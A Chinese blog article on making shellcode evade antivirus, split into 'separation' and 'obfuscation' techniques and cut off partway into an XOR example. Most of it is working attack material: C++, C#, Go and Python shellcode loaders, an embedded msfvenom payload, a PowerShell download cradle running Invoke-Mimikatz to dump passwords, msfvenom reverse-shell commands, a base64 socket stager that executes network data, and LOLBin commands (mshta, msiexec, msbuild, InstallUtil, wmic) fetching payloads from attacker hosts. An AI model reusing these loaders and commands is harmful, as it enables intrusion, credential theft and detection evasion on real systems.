shellcode免杀

那些shellcode免杀总结
作者:卿i / 2020-02-07 08:57:08
<p>自己还是想通过一篇白话文、傻瓜式的文章,把一些shellcode免杀的技巧讲清楚。希望更多和我一样的web狗也能动手实现免杀。</p>

文中我将shellcode免杀技巧分为"分离"、"混淆"两个大类,通过不同技巧针对不同的检测方式,也就是常听到的特征检测、行为检测、云查杀。

个人能力有限,文中出现错误还请斧正、轻喷。

0x01 那些shellcode"分离"免杀

首先来看看shellcode常用的C/C++加载方式。

常见方式比如函数指针执行、内联汇编指令、伪指令等方式。


但是这种把shellcode和执行程序放在一起的方式,明显很容易被查杀。


所以大多数分离免杀的思想就是把执行shellcode和加载程序分开。

来看看常见的分离加载,拿C++举例。

正常情况下,使用 VirtualAlloc 这类内存操作函数来执行shellcode:

#include "stdafx.h"
#include "windows.h"

using namespace std;
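// Baseline loader the rest of the article compares against: the payload sits
// inside the executable as a byte array, so a file scanner sees it directly.
//
// Security notes: the region is allocated RWX and jumped into straight away,
// which is the plain allocate-copy-execute pattern behavioural engines tend to
// key on; the example only exists to show what the later "separated" loaders
// change.  The bytes are the author's; the trailing "calc.exe" string suggests
// a msfvenom windows/exec payload, but that is an inference, not verified.
int main(int argc, char **argv)
{
    // The string delimiters were lost when the page was rendered; only the
    // quoting is restored here, the bytes themselves are unchanged.
    unsigned char buf[] =
        "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
        "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
        "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
        "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
        "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
        "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
        "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
        "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
        "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
        "\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
        "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5"
        "\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
        "\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

    // Allocate an executable region, copy the payload in, and call it.
    // `void exec` / `(void()())` in the published text were missing their `*`.
    void *exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (exec == NULL) {
        return 1;   // allocation failed; nothing to run
    }
    memcpy(exec, buf, sizeof buf);
    ((void (*)())exec)();
    return 0;
}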


如果要把shellcode单独分离出来,我们可以通过其他方式在运行时获取shellcode,而不是事先将shellcode写死在程序中。

举例:shellcode从文本提取或从远程下载获取。

这里把shellcode以十六进制文本的形式放在服务端,程序通过http请求(使用winhttp api)获取后解码到内存缓冲区,再动态分配内存执行shellcode:

#include "stdafx.h"
#include <cctype>
#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <iostream>
#include <string>
#include <windows.h>
#include <winhttp.h>
#pragma comment(lib,"winhttp.lib")
#pragma comment(lib,"user32.lib")
using namespace std;
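// Map one hex digit to its value, or return -1 for anything else.
static int hex_nibble(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

// Decode hex text into raw bytes in `out`.  Whitespace (e.g. a trailing
// newline in the served file) is ignored.  Returns false, with `out` empty,
// on a non-hex character or an odd number of digits.
static bool decode_hex(const std::string &text, std::string &out)
{
    out.clear();
    int high = -1;   // first digit of the pair being assembled, or -1
    for (char c : text) {
        if (isspace(static_cast<unsigned char>(c))) continue;
        const int nib = hex_nibble(c);
        if (nib < 0) {
            out.clear();
            return false;
        }
        if (high < 0) {
            high = nib;
        } else {
            out.push_back(static_cast<char>((high << 4) | nib));
            high = -1;
        }
    }
    if (high >= 0) {
        out.clear();
        return false;
    }
    return true;
}

// "Separated" loader: the payload is not in the binary; it is fetched as hex
// text over HTTP from 127.0.0.1, decoded, copied into an RWX region and called.
//
// Review notes -- the published listing had defects that meant it never ran
// the payload it fetched, so its "no longer detected" result only shows the
// static signature is gone, not that the behaviour passes:
//   * `sizeof ShellCode` was taken on a `char *`, so VirtualAlloc/memcpy only
//     ever handled 4 or 8 bytes of the decoded payload.
//   * `pszOutBuffer` was advanced while decoding and then delete[]'d, which
//     frees an interior pointer (heap corruption).
//   * Decoding and jumping happened once per WinHttpReadData chunk instead of
//     once for the whole body, so a split response would execute a fragment.
//   * The header terminator was written "/r/n" and headers were added before
//     checking that the request handle existed.
//   * `printf("%s", ShellCode)` printed binary with no terminator (over-read).
// Security notes: the transport is plaintext HTTP with no integrity or
// authenticity check, so whatever the server (or anyone on the path) returns
// is executed as native code; only the storage location changed relative to
// the first example, the allocate-RWX / copy / call sequence is the same.
// `void main()` is non-standard and was changed to `int main()`.
int main()
{
    HINTERNET hSession = NULL;
    HINTERNET hConnect = NULL;
    HINTERNET hRequest = NULL;
    BOOL bResults = FALSE;
    std::string hexText;   // whole response body, accumulated across reads

    hSession = WinHttpOpen(L"User-Agent", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
                           WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
    if (hSession) {
        hConnect = WinHttpConnect(hSession, L"127.0.0.1", INTERNET_DEFAULT_HTTP_PORT, 0);
    }
    if (hConnect) {
        hRequest = WinHttpOpenRequest(hConnect, L"POST", L"qing.txt", L"HTTP/1.1",
                                      WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, 0);
    }
    if (hRequest) {
        // Header lines end in CRLF; only touch the request once we have one.
        LPCWSTR header = L"Content-type: application/x-www-form-urlencoded\r\n";
        WinHttpAddRequestHeaders(hRequest, header, static_cast<DWORD>(lstrlenW(header)),
                                 WINHTTP_ADDREQ_FLAG_ADD);
        std::string body = "name=host&sign=xx11sad";
        bResults = WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0,
                                      const_cast<char *>(body.c_str()),
                                      static_cast<DWORD>(body.length()),
                                      static_cast<DWORD>(body.length()), 0);
    }
    if (bResults) {
        bResults = WinHttpReceiveResponse(hRequest, NULL);
    }
    if (bResults) {
        for (;;) {
            DWORD dwSize = 0;
            if (!WinHttpQueryDataAvailable(hRequest, &dwSize)) {
                printf("Error %u in WinHttpQueryDataAvailable.\n", GetLastError());
                break;
            }
            if (dwSize == 0) break;   // end of body
            std::string chunk(dwSize, '\0');
            DWORD dwDownloaded = 0;
            if (!WinHttpReadData(hRequest, &chunk[0], dwSize, &dwDownloaded)) {
                printf("Error %u in WinHttpReadData.\n", GetLastError());
                break;
            }
            if (dwDownloaded == 0) break;
            printf("ok");
            hexText.append(chunk, 0, dwDownloaded);
        }
    }
    if (hRequest) WinHttpCloseHandle(hRequest);
    if (hConnect) WinHttpCloseHandle(hConnect);
    if (hSession) WinHttpCloseHandle(hSession);

    // Decode only after the whole body has been read.
    std::string shellcode;
    if (!decode_hex(hexText, shellcode) || shellcode.empty()) {
        printf("No usable payload received.\n");
        system("pause");
        return 1;
    }

    void *exec = VirtualAlloc(0, shellcode.size(), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (exec == NULL) {
        printf("Error %u in VirtualAlloc.\n", GetLastError());
        system("pause");
        return 1;
    }
    memcpy(exec, shellcode.data(), shellcode.size());
    ((void (*)())exec)();

    system("pause");
    return 0;
}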


看下查杀情况:去除shellcode后火绒已经不杀了。(注意:原文这段代码里 VirtualAlloc 和 memcpy 用的是 sizeof ShellCode,而 ShellCode 是 char*,实际只拷贝了一个指针长度的字节,shellcode 并没有被完整执行;因此这里的"不杀"只能说明静态特征被去掉了,不能说明通过了行为检测。)

类似这种远程读取的方式还有很多,例如powershell内存加载,相信各位也没少用过。

举例:powershell远程加载mimikatz读取密码

# Download cradle: IEX executes whatever the remote URL returns, in memory and
# with no integrity or authenticity check on the fetched script.
# NOTE(review): the command was broken across lines and its closing quote became
# a curly apostrophe when the page was rendered, so it will not run as printed;
# it is kept as published rather than reassembled.
powershell IEX (New-Object Net.WebClient).DownloadString('

https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1’); Invoke-Mimikatz >>c:\1.txt


类似的还有很多,不过这种用得很多的内存加载方式,有些杀软还是会拦截的,怎么解决我们在后文再说。

其实到这里,各种语言加载器的原理不用说也知道了,这里还是解释下加载器,引用我同事对加载器的解释:

shellcode就好比一杯水,加载器就是装水的杯子,水倒进了杯子才可以喝,shellcode被加载器装载后才可以执行。

A)那些加载器执行shellcode:

ssi:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.174.142 LPORT=4444 -f c > msf.txt
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of c file: 1457 bytes
# Turn msfvenom's "-f c" output into one line of bare hex: drop the
# "unsigned char buf[] =" line, strip the \x prefixes, quotes and the
# trailing semicolon, then join the remaining lines.
grep -v unsigned msf.txt | sed 's/\\x//g; s/"//g; s/;//g' | sed ':a;N;$!ba;s/\n//g'

fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c77260789e8ffd0b89001000029c454506829806b00ffd56a0a68c0a8ae84680200115c89e6505050504050405068ea0fdfe0ffd5976a1056576899a57461ffd585c0740aff4e0875ece8670000006a006a0456576802d9c85fffd583f8007e368b366a406800100000566a006858a453e5ffd593536a005653576802d9c85fffd583f8007d285868004000006a0050680b2f0f30ffd55768756e4d61ffd55e5eff0c240f8570ffffffe99bffffff01c329c675c1c3bbf0b5a2566a0053ffd5

shellcode_launcher:

c#加载:
using System;
using System.Runtime.InteropServices;
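namespace TCPMeterpreterProcess
{
    // Minimal C# loader: P/Invoke VirtualAlloc (RWX), copy the bytes in, and
    // run them on a new thread.  Review notes on the published listing:
    //   * The 333 payload bytes were elided by the author.  `new byte[333] { }`
    //     does not compile (the initializer must supply every element), so the
    //     array is written without a fixed length and Main returns when empty.
    //   * Every pointer was declared UInt32, which only works in a 32-bit
    //     process; IntPtr/UIntPtr are used so addresses and the size are not
    //     truncated on x64.
    //   * The thread handle was never closed although CloseHandle was declared.
    //   * Curly quotes in the DllImport attributes were a rendering artefact.
    class Program
    {
        static void Main(string[] args)
        {
            // native function's compiled code, generated with metasploit
            // (the bytes were omitted by the author)
            byte[] shellcode = new byte[] { };
            if (shellcode.Length == 0)
            {
                return;
            }

            IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)(uint)shellcode.Length,
                                           MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            if (funcAddr == IntPtr.Zero)
            {
                return;
            }
            Marshal.Copy(shellcode, 0, funcAddr, shellcode.Length);

            UInt32 threadId = 0;
            IntPtr pinfo = IntPtr.Zero;   // no parameter for the thread
            // execute native code
            IntPtr hThread = CreateThread(IntPtr.Zero, 0, funcAddr, pinfo, 0, ref threadId);
            if (hThread == IntPtr.Zero)
            {
                return;
            }
            WaitForSingleObject(hThread, 0xFFFFFFFF);
            CloseHandle(hThread);
        }

        private static UInt32 MEM_COMMIT = 0x1000;
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

        [DllImport("kernel32")]
        private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,
            UIntPtr size, UInt32 flAllocationType, UInt32 flProtect);
        [DllImport("kernel32")]
        private static extern bool VirtualFree(IntPtr lpAddress,
            UIntPtr dwSize, UInt32 dwFreeType);
        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(
            IntPtr lpThreadAttributes,
            UInt32 dwStackSize,
            IntPtr lpStartAddress,
            IntPtr param,
            UInt32 dwCreationFlags,
            ref UInt32 lpThreadId
        );
        [DllImport("kernel32")]
        private static extern bool CloseHandle(IntPtr handle);
        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(
            IntPtr hHandle,
            UInt32 dwMilliseconds
        );
        [DllImport("kernel32")]
        private static extern IntPtr GetModuleHandle(
            string moduleName
        );
        [DllImport("kernel32")]
        private static extern IntPtr GetProcAddress(
            IntPtr hModule,
            string procName
        );
        [DllImport("kernel32")]
        private static extern IntPtr LoadLibrary(
            string lpFileName
        );
        [DllImport("kernel32")]
        private static extern UInt32 GetLastError();
    }
}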

py加载:
# Python loader, Windows only (ctypes.windll).
# NOTE(review): the two statements under `if whnd != 0:` lost their indentation
# and the quotes on the last line became curly apostrophes when the page was
# rendered, so this listing does not run as printed; it is kept byte-for-byte
# as published.
import base64,sys;
import ctypes

# Hide the console window (ShowWindow with nCmdShow 0, i.e. SW_HIDE).
whnd = ctypes.windll.kernel32.GetConsoleWindow()
if whnd != 0:
ctypes.windll.user32.ShowWindow(whnd, 0)
# NOTE(review): an HWND is not a kernel object handle, so CloseHandle on it is
# not meaningful; the call does nothing useful here.
ctypes.windll.kernel32.CloseHandle(whnd)

# The dict picks str (Python 2) or a bytes encoder (Python 3) for the base64
# text.  Decoded, the blob is a short socket stager: it retries a connect to a
# hard-coded host:port, reads a 4-byte length and that many bytes, then exec()s
# them -- exec() on unauthenticated data straight off the network.
exec(base64.b64decode({2:str,3:lambda b:bytes(b,‘UTF-8’)}[sys.version_info[0]](‘aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMS4zMCcsODg4OCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=’)))

go内联c加载:
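// Go loader that hands the payload to a C function through cgo.
//
// Review notes on the published listing:
//   - The cgo preamble that defines `call` (a comment block that has to sit
//     directly above `import "C"`) was not included by the author, so this
//     does not build as shown; nothing is invented here to fill it in.
//   - The "\x" escapes were stripped when the page was rendered ("xddxc6...");
//     they are restored below.  The middle of the buffer was omitted by the
//     author, so the bytes are illustrative only.
package main

import "C"
import "unsafe"

func main() {
	buf := ""
	buf += "\xdd\xc6\xd9\x74\x24\xf4\x5f\x33\xc9\xb8\xb3\x5e\x2c"
	// ... remaining bytes omitted by the author ...
	buf += "\xc9\xb1\x97\x31\x47\x1a\x03\x47\x1a\x83\xc7\x04\xe2"
	if len(buf) == 0 {
		return // &shellcode[0] would panic on an empty buffer
	}
	// at your call site, you can send the shellcode directly to the C
	// function by converting it to a pointer of the correct type.
	shellcode := []byte(buf)
	C.call((*C.char)(unsafe.Pointer(&shellcode[0])))
}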

资源加载:CPLResourceRunner
# Convert a "0x.., 0x.." byte listing to raw bytes, gzip it, and base64-encode
# the result for embedding in the CPL resource.
sed 's/[, ]//g; s/0x//g' shellcode.txt | tr -d '\n' | xxd -r -p | gzip -c | base64 > b64shellcode.txt

用Cobalt Strike 生成shellcode
Attacks -> Packages -> Windows Executable (s) -> Output => RAW (x86)

py -2 ConvertShellcode.py beacon.bin
Shellcode written to shellcode.txt

0x4d,0x5a,0x41,0x52,0x55,0x48,0x89,0xe5,0x48,0x81,0xec,0x20,0x00,0x00,0x00,0x48,0x8d,0x1d,0xea,0xff,0xff,0xff,0x48,0x89,0xdf,0x48,0x81,0xc3,0x7c,0x79,0x01,0x00,0xff,0xd3,0x41,0xb8,0xf0,0xb5,0xa2,0x56,0x68,0x04,0x00,0x00,0x00,0x5a,0x48,0x89,0xf9,0xff,0xd0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf8,0x00,0x00,0x00,0x0e,0x1f,0xba,0x0e,0x00,0xb4,0x09,0xcd,0x21,0xb8,0x01,0x4c,0xcd,0x21,0x54,0x68,0x69,0x73,0x20,0x70,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,0x63,0x61,0x6e,0x6e,0x6f,0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6e,0x20,0x69,0x6e,0x20,0x44,0x4f,0x53,0x20,0x6d,0x6f,0x64,0x65,0x2e,0x0d,0x0a,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc9,0xdb,0x6e,0xe9,0x8d,0xba,0x00,0xba,0x8d,0xba,0x00,0xba,0x8d,0xba,0x00,0xba,0xeb,0x54,0xd2,0xba,0x15,0xba,0x00,0xba,0x13

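# Convert the ConvertShellcode.py "0x.., 0x.." listing to raw bytes, gzip it,
# and base64-encode the result.  The rendered page had lost the opening quote
# of the sed script and the backslash in '\n'; both are restored here.
cat shellcode.txt | sed 's/[, ]//g; s/0x//g;' | tr -d '\n' | xxd -p -r | gzip -c | base64 > b64shellcode.txt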

H4sIAPGjM14AA/ONcgwK9eh86tH4RoGBgcGjV/bVPTrvezQerqlkZPh/2XHHh62LwjJYgLJR
Hp0//19ggIEfQMwnv4uPYQvnWcUdjD5nFUMyMosVCory04sScxWSE/Py8ksUklIVikrzFDLzFFz8
gxVy81NS9Xi5VKBGnLyd97J3F8MuGH4dcmmXKJAWBgD9vO6hmAAAAA==

Compile to x86 and copy CPLResourceRunner.dll to RunMe.cpl

powershell加载(MMFml):
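namespace mmfExeTwo
{
    using System;
    using System.IO.MemoryMappedFiles;
    using System.Runtime.InteropServices;

    class Program
    {
        // Signature the shellcode is invoked through: no arguments, IntPtr (RAX) returned.
        private delegate IntPtr NewDelegate();

        // Copies the embedded shellcode into a memory-mapped file created with
        // ReadWriteExecute access and calls it through a delegate built from the
        // view's raw pointer. The point of the technique is that no VirtualAlloc /
        // VirtualProtect(PAGE_EXECUTE_READWRITE) call is made by this process; the
        // executable mapping comes from the MMF API instead.
        //
        // Returns whatever the shellcode leaves in RAX, or IntPtr.Zero if setting up
        // the mapping failed. Needs an unsafe build (/unsafe) and - because the bytes
        // below are x64 code - a 64-bit process; an AnyCPU build with "Prefer 32-bit"
        // would crash at the call.
        private unsafe static IntPtr GetShellMemAddr()
        {
            // Payload bytes. The prologue (0xfc 0x48 0x83 0xe4 0xf0 ... 0x65 0x48 0x8b 0x52 0x60)
            // is the usual msfvenom x64 block-API stub, and the array ends in
            // 0x63 0x61 0x6c 0x63 0x00 = "calc\0": the embedded command is plain "calc",
            // not "cmd /k calc" as the original comment claimed. The hash constants are
            // consistent with windows/x64/exec (WinExec, EXITFUNC=thread) - regenerate
            // rather than trust this comment if the exact command matters.
            var shellcode = new byte[]
                {
                     0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
                     0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,
                     0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,
                     0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,
                     0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,
                     0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,
                     0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,
                     0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,
                     0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,
                     0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,
                     0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,
                     0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
                     0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,
                     0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,
                     0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
                     0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,
                     0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x00
                };

            MemoryMappedFile mmf = null;
            MemoryMappedViewAccessor viewaccessor = null;
            byte* pointer = null;

            try
            {
                // Named mapping: a second copy started while this one is still alive fails
                // CreateNew ("already exists") and ends up in the catch below.
                mmf = MemoryMappedFile.CreateNew("__shellcode", shellcode.Length, MemoryMappedFileAccess.ReadWriteExecute);
                viewaccessor = mmf.CreateViewAccessor(0, shellcode.Length, MemoryMappedFileAccess.ReadWriteExecute);
                viewaccessor.WriteArray(0, shellcode, 0, shellcode.Length);

                // AcquirePointer pins the view and must be balanced by ReleasePointer (done in
                // finally). View offset is 0, so no PointerOffset adjustment is needed here.
                viewaccessor.SafeMemoryMappedViewHandle.AcquirePointer(ref pointer);
                var func = (NewDelegate)Marshal.GetDelegateForFunctionPointer(new IntPtr(pointer), typeof(NewDelegate));

                // Runs synchronously on this thread; the mapping stays alive until it returns.
                return func();
            }
            catch
            {
                // Best-effort loader: any setup failure (mapping exists, access denied, ...)
                // is reported as Zero rather than propagated. Kept from the original.
                return IntPtr.Zero;
            }
            finally
            {
                // The original disposed both objects unconditionally, which throws a
                // NullReferenceException out of the finally block whenever CreateNew itself
                // failed (mmf/viewaccessor still null) and hides the real error.
                if (pointer != null)
                {
                    viewaccessor.SafeMemoryMappedViewHandle.ReleasePointer();
                }
                if (viewaccessor != null)
                {
                    viewaccessor.Dispose();
                }
                if (mmf != null)
                {
                    mmf.Dispose();
                }
            }
        }

        // Entry point: just runs the loader; the shellcode's return value is ignored.
        static void Main(string[] args)
        {
            GetShellMemAddr();
        }
    }
}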

# Regenerates the byte array above in C# syntax. Two things to check against the embedded bytes:
# the array ends in 63 61 6c 63 00 ("calc\0"), so it was produced with CMD=calc rather than with
# this exact command line; and cmd.exe's documented switch is /c - "cmd.exe -c calc.exe" is not the
# documented form and should be verified before relying on it.
msfvenom -p windows/x64/exec CMD="cmd.exe -c calc.exe" -f csharp

Invoke-MMFml


加载器就到这里吧,加载器的实现有能力可以自己造轮子,免杀效果非常不错的。

B)Lolbins白利用加载shellcode

除了加载器这种"杯子和水"的分离的思想,个人认为还具有"分离"免杀思想的就是Lolbins,也就是白名单。

下面例举一些白利用。这类“分离”主要针对行为检测：比如某个程序在其正常运行上下文中不该调用某个 API，一旦调用就会被捕获；白利用则借助系统自带的可信程序去执行，从而绕过这种行为捕获。不过白利用中有的 shellcode 或可执行文件仍然需要落地，落地后还是可能被查杀，这一点文后会提到，先来看白利用。

LOLBins，全称 “Living-Off-the-Land Binaries”，直译是“就地取材的二进制”，即利用系统自带的合法程序来完成攻击动作。这个概念最初在 2013 年 DerbyCon 黑客大会上由 Christopher Campbell 和 Matt Graeber 提出，后来 Philip Goh 提出了 LOLBins 这个名称。说白了就是白利用，举个例子:

DarkHydrus APT样本

MD5:B108412F1CDC0602D82D3E6B318DC634

使用到的启动命令：cscript.exe "C:\Users\Public\Documents\OfficeUpdateService.vbs"

这里就用了cscript加载vbs 添加开机启动项,启动脚本。

mshta:
payload:
# x86 meterpreter reverse_tcp stager, raw bytes; -o writes the file instead of a shell redirect.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.134 LPORT=53 -a x86 --platform windows -f raw -o shellcode.bin

# Single-line (-w 0) base64 of the raw stager, ready to paste into the HTA template.
base64 -w 0 shellcode.bin

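REM URL restored: the page printed "134 /qing.hta" with a space, which mshta would treat as two
REM arguments. mshta downloads and runs the HTA; qing.hta is the CACTUSTORCH template linked
REM below with the base64 shellcode from the previous step pasted in.
mshta.exe http://192.168.174.134/qing.hta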

替换模板:
https://raw.githubusercontent.com/mdsecactivebreach/CACTUSTORCH/master/CACTUSTORCH.hta

shellcode替换位置:

Msiexec:
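# "- f msi" on the page is a typo for "-f msi". Wraps the x64 stager in an MSI; the .txt name is
# cosmetic as far as "msiexec /i" is concerned. Note LPORT=4444 here vs 53 in the other examples.
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.174.134 LPORT=4444 -f msi > qing.txt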

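REM URL restored (the page had a space after the host). msiexec fetches the MSI over HTTP and
REM installs it quietly (/q); the payload runs as part of the install.
C:\Windows\System32\msiexec.exe /q /i http://192.168.174.134/qing.txt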
加载dll:

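# "- f dll" on the page is a typo for "-f dll". Same x64 stager, emitted as a DLL for msiexec /y.
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.174.134 LPORT=53 -f dll > qing.dll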

REM /y = "register module": msiexec loads the DLL and calls its DllRegisterServer export.
REM Presumably the msfvenom DLL fires its payload on load (DllMain), so the export itself
REM does not matter - verify on the target build.
msiexec /y C:\qing.dll

Msbuild:
REM msbuild compiles and runs the task code embedded in qing.xml (3gstudent's
REM msbuild-inline-task template, linked below), so the shellcode travels inside the XML.
REM This is the 32-bit Framework\ path; use Framework64\ for an x64 payload.
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe qing.xml

模板用三好师傅的:
https://github.com/3gstudent/msbuild-inline-task

Installutil:
编译:
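REM "System.Ente rpriseServices.dll" on the page is a line-wrap artifact; the reference is
REM System.EnterpriseServices.dll. Builds a class library (/target:library) that /out names
REM qing.exe, signed with the given key file so InstallUtil accepts it; /unsafe is needed if
REM installutil.cs (not shown) uses pointer code for the shellcode.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:qing.exe /keyfile:C:\Users\John\Desktop\installutil.snk /unsafe C:\Users\John\Desktop\installutil.cs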

执行:
REM /U runs the assembly's installer in uninstall mode - the referenced write-up (link below)
REM presumably places the payload in the Uninstall path so no prior install is needed.
REM /logfile= with an empty value and /LogToConsole=false keep it from writing a log.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U qing.exe

详细:
https://www.blackhillsinfosec.com/how-to-bypass-application-whitelisting-av/

wmic:
REM wmic fetches the XSL over HTTP and applies it to the query output; the template linked
REM below (kmkz wmic-poc.xsl) is expected to carry script that then runs inside wmic.exe.
REM example.com is a placeholder for the attacker-controlled host.
wmic os get /FORMAT:"http://example.com/evil.xsl"

模板:
https://raw.githubusercontent.com/kmkz/Sources/master/wmic-poc.xsl

csc:
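# The page rendered the option dashes as non-ASCII hyphens (U+2010) and split "-f"; both restored.
# NOTE: this is the x64 payload, but the csc line below builds /platform:x86 with the 32-bit
# Framework - an x64 stager inside an x86 process crashes. Pick one architecture for both steps.
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.174.132 LPORT=53 -f csharp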

REM Builds a 32-bit binary (/platform:x86, 32-bit Framework\ v2.0 compiler), but the msfvenom
REM line above generates windows/x64/shell/reverse_tcp - an x64 payload will crash inside an
REM x86 process. Either generate windows/shell/reverse_tcp (x86) or build with
REM Framework64\ and /platform:x64. /unsafe: the source presumably uses pointer code.
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:D:\test\InstallUtil-shell.exe D:\test\InstallUtil-ShellCode.cs

编译出的 InstallUtil-shell.exe 按上面 Installutil 小节的方式（InstallUtil.exe /U）执行即可


白利用就不列举更多了，其他白利用也是同样的道理。那么问题来了：前面说的白利用在某些场景下，我们用 shellcode 生成的 exe 或 dll 还是要落地。

虽然前面说的内存加载可以解决这个问题,那假设必须落地,怎么逃过各种检测呢?

这就是我归为免杀的第二个方式大类,混淆免杀

0x02 那些shellcode"混淆"免杀

shellcode是否可以像php一句话那样混淆、加密、拆分

还是从最简单的举例子开始

A)shellcode编码混淆

xor 异或加密 shellcode 后，运行时先解密再申请内存执行，除了多一步解密之外，和文章开头执行 shellcode 的方式没有区别。

这里拿C# xor为例子(ShellcodeWrapper):
using System;
using System.IO;
using System.Collections.Generic;
using System.Text;
using System.Threading.Tasks;
using System.Security.Cryptography;
using System.Runtime.InteropServices;

namespace RunShellCode
{
